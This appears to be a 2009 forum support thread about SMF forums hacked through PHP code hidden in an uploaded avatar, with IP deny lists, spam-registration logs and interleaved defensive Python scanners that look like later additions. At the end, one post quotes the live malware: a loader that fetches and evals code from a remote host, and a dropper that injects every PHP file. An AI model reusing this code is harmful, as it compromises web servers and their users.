Hacked, script injection

Started by vHawkeyev, May 01, 2009, 10:47:02 AM


confusion

Quote from: Tiribulus on May 08, 2009, 11:21:03 AM
This has got me pretty nervous.

Also, I found this in my referrer file:
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM


This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.



Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.

rbbot

I'd recommend banning the subnet 94.142.128.0/21, which is the subnet allocated to the AS number of the Latvian hosting company from which these attacks originate - at your firewall if you can, rather than in the forum settings. According to their website, it's not an ISP, just a hosting provider, so unless you are expecting other servers to connect to yours....

The hosting company is http://www.cssgroup.lv/?lang=eng

whatnow

I need some help, I have been hacked by this and just found this thread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website: when I make a post, I get a blank page, but then if I hit my back key the post is there. I tried to put my forum in maintenance mode now and I get a blank page, but it is in maintenance mode. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now? Is it better to clean the code out of the php files or just put all new ones in, and what is causing my pages to go blank now?

Thanks
GrannyD

Tiribulus

Quote from: confusion on May 08, 2009, 01:07:26 PM
Quote from: Tiribulus on May 08, 2009, 11:21:03 AM
This has got me pretty nervous.

Also, I found this in my referrer file:
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM


This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.



Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.

I meant that this topic as a whole has me worried, but I do appreciate the explanation. Still doesn't sound too good though.

oakview

It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IPs being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everyone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:


order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all

Sunday Driver

Quote from: StarWars Fan on May 07, 2009, 05:23:24 PM
Please be advised that this user is also using another alias - something like MagicOPromotion

[email protected]
94.142.128.140
IP address   94.142.128.140
Hostname   Not available
ISP   SIA CSS GROUP hosting
Country   Latvia


He tried registering on my forum, but, I don't allow avatar uploads for new users and I deleted him promptly in any event  8)

Interesting, I had that user on my forum for a while. It took me a few days before I found it and banned the IP, but it never uploaded an avatar. Thankfully!

busterone

Quote from: oakview on May 08, 2009, 10:42:24 PM
It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IPs being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everyone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:


order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all

I would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational member base, and quite a few are from the UK, Norway, the Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.

JBlaze

OK, since I am getting quite a few PM's from members who are having problems with this hack on their forums, let me make it clear that I DO NOT offer PM support. Any PM's requesting support without my prior consent WILL BE IGNORED/DELETED!

If you wish to receive support from me regarding this hack, whether it be cleaning it or just pure advice on how to do it yourself, please see my Help Available topic and we will go from there.

I am sorry to sound cranky/senile/whatever... but to be quite honest, it's getting ridiculous. I try my best to offer support when I can and I do have a heart believe it or not. But PM'ing me for support just drives me up a wall. The reason for these forums is so that everyone can see the issue and everyone can provide some help where they can.

So pretty please with lots of sugar on top, do not PM me unless I give you consent to do so. Thank you.

Regards,
JBlaze
Jason Clemons
Former Team Member 2009 - 2012

oakview

Quote: I would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational memberbase, and quite a few are from UK, Norway, Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.
@busterone - Like I said in my post,
Quote: the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest.
If you are multi-national as I'm sure many forums are, that approach is not for you. For those that aren't however, it is an option to be considered, carefully considered.

busterone

No problem. If it works, it works.  :)

Soulgirl

I had this problem too... cleaned everything out and still had problems.  Google led me here and I too had krisbarteo as a member.  Banned and deleted him and everything's back to normal.

Thanks guys :)

NinjaZXR

Quote from: GrannyD on May 08, 2009, 10:01:55 PM
I need some help, I have been hacked by this and just found this thread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website: when I make a post, I get a blank page, but then if I hit my back key the post is there. I tried to put my forum in maintenance mode now and I get a blank page, but it is in maintenance mode. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now? Is it better to clean the code out of the php files or just put all new ones in, and what is causing my pages to go blank now?

Thanks
GrannyD

Rather than editing all php files I just replaced all files and folders from a recent backup.
No more errors on the forum.
This should serve as a good reminder to create regular backups.
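Whether you clean the files or restore from backup, you still want to know which files were touched and whether the restore actually removed everything. The script below is an added example, not code from this thread or from SMF: a read-only scanner (with an explicit opt-in to strip) for the `eval(base64_decode('...'))` prologue the stage-2 script quoted later in this thread prepends to every PHP file (its own `clear_exploits()` regex is what it uses to recognise a prior infection), plus a name check for the files that script drops or knows about (`style.css.php`, `s.php`, `dg.php`, `los.php`, `r0x.php`). The sample tree in `demo()` is constructed here; the base64 string in it decodes to the word "constructed" and is never evaluated.

```python
import os
import re
import tempfile

# Signature of the prologue the dropper prepends to each .php file. Derived from
# the clear_exploits() regex in the stage-2 script quoted in this thread:
#   <?php /**/ eval(base64_decode('...'));?>
INJECTION_RE = re.compile(
    rb"<\?(?:php)?\s*(?:/\*\*/)?\s*eval\(\s*base64_decode\([^)]*\)\s*\)\s*;\s*\?>",
    re.IGNORECASE,
)

# File names the stage-2 script writes (dgin/dgsf/dgdn) or treats as rival
# shells ($alien_shells). A hit is a finding for a human, not something to
# delete automatically.
DROPPED_NAMES = {"style.css.php", "s.php", "dg.php", "los.php", "r0x.php"}
PHP_EXTS = (".php", ".phtml", ".php3")   # the extensions the dropper itself targets


def find_injections(data: bytes):
    """Return (offset, matched_bytes) for every injected prologue in a file body."""
    return [(m.start(), m.group(0)) for m in INJECTION_RE.finditer(data)]


def strip_injections(data: bytes):
    """Remove the injected prologue(s). Returns (cleaned_bytes, removed_count)."""
    cleaned, n = INJECTION_RE.subn(b"", data)
    if n == 0:
        return data, 0
    return cleaned.lstrip(b"\r\n"), n


def scan_tree(root: str):
    """Walk a web root; return {path: reason} for infected files and dropped artefacts."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() in DROPPED_NAMES:
                findings[path] = "dropped-file name"
                continue
            if not name.lower().endswith(PHP_EXTS):
                continue
            with open(path, "rb") as fh:
                data = fh.read()
            hits = find_injections(data)
            if hits:
                findings[path] = (f"{len(hits)} injected eval(base64_decode) "
                                  f"prologue(s), first at offset {hits[0][0]}")
    return findings


def clean_tree(root: str, apply: bool = False):
    """Strip prologues from infected files. Dry run unless apply=True.
    Returns {path: removed_count}; dropped files are left for manual review."""
    removed = {}
    for path, reason in scan_tree(root).items():
        if "injected" not in reason:
            continue
        with open(path, "rb") as fh:
            data = fh.read()
        cleaned, n = strip_injections(data)
        if n and apply:
            with open(path, "wb") as fh:
                fh.write(cleaned)
        removed[path] = n
    return removed


# Constructed inputs: an infected stand-in file, a clean one, and a dropped file.
CONSTRUCTED_INFECTED = (
    b"<?php /**/ eval(base64_decode('Y29uc3RydWN0ZWQ='));?>\n"
    b"<?php\n// constructed stand-in for a legitimate forum file\necho 'index';\n"
)
CONSTRUCTED_CLEAN = b"<?php\n// untouched constructed file\necho 'ok';\n"


def demo():
    """Build a throwaway tree, scan it, clean it, and scan again."""
    root = tempfile.mkdtemp(prefix="smf-scan-")
    os.makedirs(os.path.join(root, "Sources"))
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(CONSTRUCTED_INFECTED)
    with open(os.path.join(root, "Sources", "Helper.php"), "wb") as fh:
        fh.write(CONSTRUCTED_CLEAN)
    with open(os.path.join(root, "Sources", "style.css.php"), "wb") as fh:
        fh.write(b"<?php // constructed dropped file\n")
    before = scan_tree(root)
    removed = clean_tree(root, apply=True)
    after = scan_tree(root)
    return before, removed, after


if __name__ == "__main__":
    for label, result in zip(("before", "removed", "after"), demo()):
        print(label, result)
```

Run `scan_tree("/path/to/forum")` first and read the report; only call `clean_tree(..., apply=True)` on a copy you have already backed up, and still compare the result against a known-good copy of the forum, because the regex only removes the prologue it knows about and says nothing about anything else the dropper's shell may have done.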

tumbleweed

Appears our friend has posted up his tactics; all these folks tried to join within a day:

415 marpmayclerax  [email protected] 194.8.75.16 Today at 12:28:03 AM   
416 JeoneeCausa  [email protected] 213.163.65.83 Today at 12:54:40 AM   
417 totonoittee  [email protected] 71.230.120.176 Today at 01:41:29 AM   
418 auditajaw  [email protected] 89.28.3.241 Today at 02:51:53 AM   
419 intitrelf  [email protected] 221.116.142.90 Today at 03:57:37 AM   
420 mamHoaphons  [email protected] 195.2.240.117 Today at 04:07:06 AM   
421 KesBreaphWese  [email protected] 194.8.75.15 Today at 05:52:15 AM   
422 drycletefetle  [email protected] 194.8.75.54 Today at 05:59:14 AM   
423 nupabadoPeeda  [email protected] 194.8.75.42 Today at 06:01:03 AM   
424 раскрутка сайтов  [email protected] 95.220.71.169 Today at 08:00:57 AM   
425 wowgoldstright  [email protected] 89.149.217.184 Today at 08:12:47 AM   
426 guenciede  [email protected] 64.56.73.226 Today at 09:45:28 AM   
427 getapruntee  [email protected] 221.179.6.85 Today at 09:47:13 AM   
428 adefeclew  [email protected] 86.57.155.242 Today at 10:02:56 AM   
429 Natreseearm  [email protected] 94.178.5.237 Today at 11:04:13 AM   
430 nuyullerxruu  [email protected] 94.102.51.196 Today at 11:59:40 AM   
431 eagetaacitire  [email protected] 87.117.35.79 Today at 12:17:42 PM   
432 voidonduchend  [email protected] 95.24.206.154 Today at 12:59:28 PM   
433 irrapeApocA  [email protected] 64.56.73.226 Today at 03:20:13 PM   
434 inardynutty  [email protected] 195.2.240.117 Today at 03:30:09 PM   
435 Veinswaw  [email protected] 65.15.161.58 Today at 05:10:38 PM   
436 JernHinna  [email protected] 64.56.73.226 Today at 05:13:52 PM   
437 Injecume  [email protected] 68.32.158.166 Today at 06:58:25 PM   
438 Infefsendeamp  [email protected] 64.56.73.226 Today at 07:02:38 PM   
439 Dimbsuisa  [email protected] 86.121.176.110 Today at 07:05:38 PM   
   
Hope everyone has tightened up the forums.
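A list like the one above is easier to act on when it is parsed rather than eyeballed: the same IP registering four accounts in a day, several accounts from one /24, or an address inside a range someone has already identified (rbbot's 94.142.128.0/21 earlier in the thread) are the signals to ban on. The script below is an added example, not from this thread or from SMF; it parses lines in the pasted member-list format (the e-mail column is redacted on the page, so the pattern accepts that placeholder as well as a real address). The sample is a subset of the lines above plus one constructed line reusing the 94.142.128.140 address reported earlier in the thread.

```python
import ipaddress
import re
from collections import Counter

# One registration per line: id, username, e-mail, IP, timestamp. The e-mail
# column is redacted on the page, so accept the literal placeholder too.
LINE_RE = re.compile(
    r"^(?P<id>\d+)\s+(?P<name>.+?)\s+(?P<email>\S+@\S+|\[email protected\])"
    r"\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<when>.+?)\s*$"
)

# Subset of the list posted above; the last line is constructed and reuses the
# 94.142.128.140 address from the earlier report in this thread.
SAMPLE = """\
415 marpmayclerax  [email protected] 194.8.75.16 Today at 12:28:03 AM
417 totonoittee  [email protected] 71.230.120.176 Today at 01:41:29 AM
420 mamHoaphons  [email protected] 195.2.240.117 Today at 04:07:06 AM
421 KesBreaphWese  [email protected] 194.8.75.15 Today at 05:52:15 AM
422 drycletefetle  [email protected] 194.8.75.54 Today at 05:59:14 AM
423 nupabadoPeeda  [email protected] 194.8.75.42 Today at 06:01:03 AM
426 guenciede  [email protected] 64.56.73.226 Today at 09:45:28 AM
433 irrapeApocA  [email protected] 64.56.73.226 Today at 03:20:13 PM
434 inardynutty  [email protected] 195.2.240.117 Today at 03:30:09 PM
436 JernHinna  [email protected] 64.56.73.226 Today at 05:13:52 PM
438 Infefsendeamp  [email protected] 64.56.73.226 Today at 07:02:38 PM
999 MagicOPromotion  [email protected] 94.142.128.140 Today at 08:00:00 PM
"""


def parse_registrations(text: str):
    """Turn pasted member-list lines into dicts; lines that do not match are skipped."""
    regs = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            regs.append(m.groupdict())
    return regs


def repeated_ips(regs, min_count: int = 2):
    """IPs that registered at least min_count accounts."""
    counts = Counter(r["ip"] for r in regs)
    return {ip: n for ip, n in counts.items() if n >= min_count}


def busy_prefixes(regs, prefixlen: int = 24, min_count: int = 2):
    """Networks (default /24) with at least min_count registrations: catches an
    attacker rotating through neighbouring addresses, as 194.8.75.x does above."""
    counts = Counter(
        str(ipaddress.ip_network(f"{r['ip']}/{prefixlen}", strict=False)) for r in regs
    )
    return {net: n for net, n in counts.items() if n >= min_count}


def in_blocklist(regs, cidrs):
    """(name, ip) pairs whose address falls inside any of the given CIDR ranges."""
    nets = [ipaddress.ip_network(c) for c in cidrs]
    return [
        (r["name"], r["ip"])
        for r in regs
        if any(ipaddress.ip_address(r["ip"]) in n for n in nets)
    ]


if __name__ == "__main__":
    regs = parse_registrations(SAMPLE)
    print("repeated IPs:", repeated_ips(regs))
    print("busy /24s:   ", busy_prefixes(regs))
    print("in 94.142.128.0/21:", in_blocklist(regs, ["94.142.128.0/21"]))
```

The /24 grouping is a heuristic, not an allocation boundary; check the actual prefix in whois before turning a busy /24 into a ban, and prefer the hosting provider's own range (as rbbot did) over the kind of whole-first-octet rules discussed earlier in this thread.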

JBlaze

Mine's sealed up tighter than a crab's ass :P
Jason Clemons
Former Team Member 2009 - 2012

busterone

 :D
Mine as well. I haven't even had a valid registration in 3 days.

WillyP

One of my forums got hit by Krisbarteo too. Every php file on the domain, same as described here. So I created a post-based member group to prevent uploading and attaching until a member has 10 posts. There was an uploaded avatar, the only avatar that was a jpg, 1x1 pixel. Opened it up and sure enough, php code. I wonder if the upload script could compare file size to image size and flag suspicious files? Would this be easier than scanning a file for php tags? For that matter, who would ever upload a 1x1 image anyway?  Of course, if a minimum image size was enacted, it would be pretty easy for someone to just use a larger image.
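The checks WillyP describes are cheap to do together rather than choosing one: read the real container type and dimensions from the file header (not the extension), refuse absurdly small images, compare the byte count against what those pixels could honestly need, and look for a PHP open tag anywhere in the body. The code below is an added example, not part of SMF or of this thread; the minimum side length (8 pixels) and the metadata allowance (1024 bytes) are assumed policy values, and the three sample files are constructed here: a legal 1x1 GIF with a harmless PHP stub appended to stand in for the avatar described above, a clean 64x64 PNG header, and a tiny JPEG with only APP0 and SOF0 segments.

```python
import re
import struct

# Declared extension -> container the magic bytes must actually identify.
EXPECTED_KIND = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}

# Any PHP open tag inside an image is a red flag (`<?php`, `<?=`, or `<?` followed
# by whitespace or `;`). Deliberately not matching `<?xml`, which shows up in
# legitimate metadata.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=|[\s;])", re.IGNORECASE)

MIN_SIDE = 8          # assumed policy: refuse avatars smaller than 8x8
HEADER_SLACK = 1024   # assumed allowance for headers/metadata before the size rule fires


def image_dimensions(data: bytes):
    """Return (kind, width, height) parsed from the container header, or None."""
    if data[:8] == b"\x89PNG\r\n\x1a\n" and data[12:16] == b"IHDR":
        w, h = struct.unpack(">II", data[16:24])
        return "png", w, h
    if data[:6] in (b"GIF87a", b"GIF89a"):
        w, h = struct.unpack("<HH", data[6:10])
        return "gif", w, h
    if data[:2] == b"\xff\xd8":
        i = 2
        while i + 4 <= len(data) and data[i] == 0xFF:
            marker = data[i + 1]
            if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
                i += 2                      # stand-alone markers carry no length
                continue
            seglen = struct.unpack(">H", data[i + 2:i + 4])[0]
            if 0xC0 <= marker <= 0xCF and marker not in (0xC4, 0xC8, 0xCC):
                if i + 9 > len(data):
                    return None
                h, w = struct.unpack(">HH", data[i + 5:i + 9])  # SOFn: precision, height, width
                return "jpeg", w, h
            i += 2 + seglen                 # skip to the next segment
    return None


def check_avatar(data: bytes, declared_ext: str):
    """Return the reasons to reject an upload; an empty list means it passes."""
    parsed = image_dimensions(data)
    expected = EXPECTED_KIND.get(declared_ext.lower())
    if parsed is None or expected is None:
        return ["not a recognised image container"]
    kind, w, h = parsed
    reasons = []
    if kind != expected:
        reasons.append(f"magic bytes say {kind}, extension says {declared_ext}")
    if w < MIN_SIDE or h < MIN_SIDE:
        reasons.append(f"image is only {w}x{h} pixels")
    # An uncompressed RGBA raster plus header slack bounds any honest file of
    # these dimensions; a 1x1 image weighing kilobytes carries something else.
    if len(data) > w * h * 4 + HEADER_SLACK:
        reasons.append(f"{len(data)} bytes is far more than {w}x{h} pixels need")
    if PHP_TAG_RE.search(data):
        reasons.append("contains a PHP open tag")
    return reasons


# Constructed samples (not real uploads).
TINY_GIF_WITH_PHP = (
    b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x80\x00\x00"    # 1x1, 2-colour global palette
    + b"\x00\x00\x00\xff\xff\xff"                             # palette
    + b"\x2c" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"    # image descriptor
    + b"\x02\x02\x44\x01\x00\x3b"                             # minimal LZW block + trailer
    + b"<?php /* constructed stub, not the real payload */ ?>" + b"A" * 2048
)
CLEAN_PNG = (
    b"\x89PNG\r\n\x1a\n" + struct.pack(">I", 13) + b"IHDR"
    + struct.pack(">IIBBBBB", 64, 64, 8, 6, 0, 0, 0) + b"\x00\x00\x00\x00"  # CRC not checked here
)
SMALL_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # APP0
    + b"\xff\xc0" + struct.pack(">H", 11) + b"\x08" + struct.pack(">HH", 32, 48) + b"\x01\x01\x11\x00"  # SOF0
    + b"\xff\xd9"
)

if __name__ == "__main__":
    print(check_avatar(TINY_GIF_WITH_PHP, "jpg"))
    print(check_avatar(CLEAN_PNG, "png"), check_avatar(SMALL_JPEG, "jpg"))
```

The size rule is the one WillyP asked about and it is a heuristic: a PNG stuffed with legitimate metadata can trip it, so treat a hit as "hold for review" rather than a hard error, while a PHP tag or a header/extension mismatch is reason enough to reject outright. None of this replaces the real fix on the server side, which is to keep the upload directory out of any path the web server will execute PHP from.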

chrishicks

Ever think these hackers come here to see what everyone is saying for future research? It wouldn't be hard to come here, look around at all these posts and see what everyone is saying on how to prevent the attacks and then just adjust to our adjustments. Plus, with all the websites listed all around the board they have an unlimited supply of potential victims.

tjhanes

Quote from: sjokomelk on May 06, 2009, 01:35:59 PM
I dunno if this will help anyone but the content of the avatar is the following:
I've cleaned it up a little.

<?php;$url 'http://wplsat23.net/?update=main';$done false;if(!$url){return '';}$url_info parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" $url_info[query] : ""; $query "GET " $url_info[path] . " HTTP/1.1\r\n"; $query $query "Host: " $url_info[host] . "\r\n"; $query $query "Accept: */*" "\r\n"; $query $query "Connection: close" "\r\n"; $query $query "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "\r\n"; $query $query "\r\n"; $errno 0; $error ""; $sock fsockopen($url_info[host], $url_info[port], $errno$error30);$h = array();$resp = array();if($sock){stream_set_timeout($sock30);fwrite($sock$query);$hd false;while(!feof($sock)){$l fgets($sock);if(!$hd){if(trim($l) == ''){$hd true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret implode(""$resp);eval($ret);?>

and this is the code on that page:
$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
